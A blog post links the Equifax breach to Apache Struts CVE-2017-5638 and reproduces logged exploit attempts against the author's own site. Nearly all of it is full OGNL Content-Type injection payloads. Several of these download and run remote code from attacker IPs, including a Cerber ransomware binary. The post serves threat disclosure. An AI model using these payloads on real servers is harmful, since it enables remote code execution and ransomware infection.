Equifax was compromised through Apache Struts (CVE-2017-5638); here are example attack attempts from my own logs

On 15 September 2017, Equifax stated that its compromise happened through exploitation of a vulnerability in Apache Struts, CVE-2017-5638 (published in March 2017, when it was already being exploited in the wild), which is triggered by a crafted Content-Type HTTP request header. For those interested, here are the log lines of 28 (untargeted) requests that attempted to exploit this vulnerability against my own blog (which does not run Apache Struts) between 10 March 2017 and 14 September 2017.

The lines are quite long; scroll to the right in the grey box below. Each line contains a single “#cmd=” that defines a command and a single “#cmds=” (I highlighted those parts in bold below) that feeds the command to cmd.exe on Windows systems and to /bin/bash on non-Windows systems. 12 of the 28 cases attempt to download and run code; the remaining 16 only execute echo “Struts2045” or echo “Aman4Wolves” and appear to be probes for the vulnerability. In only one case could the payload still be retrieved: hxxp://82.165.129.119/UnInstall.exe, which contains Cerber ransomware. So this was an attempt to distribute ransomware by exploiting CVE-2017-5638; the source was 220.191.231.222, registered to ‘Jinhua Electronic Government Network’.

blog.cyberwar.nl-forensic.log:+25030:58c2e12a:40|GET / HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http%3a//65.254.63.20/.jb %7c perl ; cd /tmp ; curl -O http%3a//65.254.63.20/.jb ; fetch http%3a//65.254.63.20/.jb ; perl .jb ;rm -rf .jb*').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+18708:58ce3b02:5f|GET / HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http%3a//65.254.63.20/oz %7c perl ; cd /tmp ; curl -O http%3a//65.254.63.20/oz ; fetch http%3a//65.254.63.20/oz ; perl oz ;rm -rf oz*').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+25980:58d00e81:14|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+5491:58d2431c:10|GET / HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cmd.exe /c echo open 82.165.129.119 21 >> ik &echo user anonymous anonymous>> ik &echo binary >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s%3aik &del ik &1.exe &exit').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+5481:58d2431c:21|GET / HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http%3a//65.254.63.20/a%7csh ; rm -rf a ; curl -O http%3a//65.254.63.20/a ; sh a ').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+4485:58d2431c:34|GET / HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='BITSAdmin.exe /Transfer JOB http%3a//82.165.129.119/UnInstall.exe %25TEMP%25/UnInstall.exe & %25TEMP%25/UnInstall.exe').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+13314:58d45e97:54|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+4017:58ebf9b6:46|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+14242:58f02f0c:f9|GET / HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http%3a//65.254.63.20/oz %7c perl ; cd /tmp ; curl -O http%3a//65.254.63.20/oz ; fetch http%3a//65.254.63.20/oz ; perl oz ;rm -rf oz*').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+16047:58f02f12:9|GET /login/ HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http%3a//65.254.63.20/oz %7c perl ; cd /tmp ; curl -O http%3a//65.254.63.20/oz ; fetch http%3a//65.254.63.20/oz ; perl oz ;rm -rf oz*').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+15024:58f02f14:b2|GET /wp-login.php HTTP/1.1|Accept-Encoding:identity|Host:blog.cyberwar.nl|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http%3a//65.254.63.20/oz %7c perl ; cd /tmp ; curl -O http%3a//65.254.63.20/oz ; fetch http%3a//65.254.63.20/oz ; perl oz ;rm -rf oz*').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+6171:590e8bf2:64|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+21732:59233fb2:7|GET / HTTP/1.1|Host:blog.cyberwar.nl|User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36|Content-Type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget 185.159.82.142/10 &> /dev/null').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Referer:http%3a//149.210.129.7|Accept-Encoding:gzip
blog.cyberwar.nl-forensic.log:+26909:5924b39c:2d|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+14205:592ab9f1:d8|GET / HTTP/1.1|Host:blog.cyberwar.nl|User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36|Content-Type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget 188.138.105.88/18 &> /dev/null').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Referer:http%3a//149.210.129.7|Accept-Encoding:gzip
blog.cyberwar.nl-forensic.log:+15355:592ab9f1:16|GET / HTTP/1.1|Host:blog.cyberwar.nl|User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36|Content-Type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget 188.138.105.88/18 &> /dev/null').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Referer:http%3a//149.210.129.7|Accept-Encoding:gzip
blog.cyberwar.nl-forensic.log:+15448:592ab9f1:4|GET / HTTP/1.1|Host:blog.cyberwar.nl|User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36|Content-Type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget 188.138.105.88/18 &> /dev/null').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Referer:http%3a//149.210.129.7|Accept-Encoding:gzip
blog.cyberwar.nl-forensic.log:+12791:59359766:28|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+23218:5940ef00:180|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+26725:5949c3cb:58|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//149.210.129.7%3a80|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+6599:597b4f8e:d9|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//149.210.129.7|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+18295:597ef9c9:1e|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//149.210.129.7%3a80/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+24880:5980d5ad:0|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//149.210.129.7%3a80/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
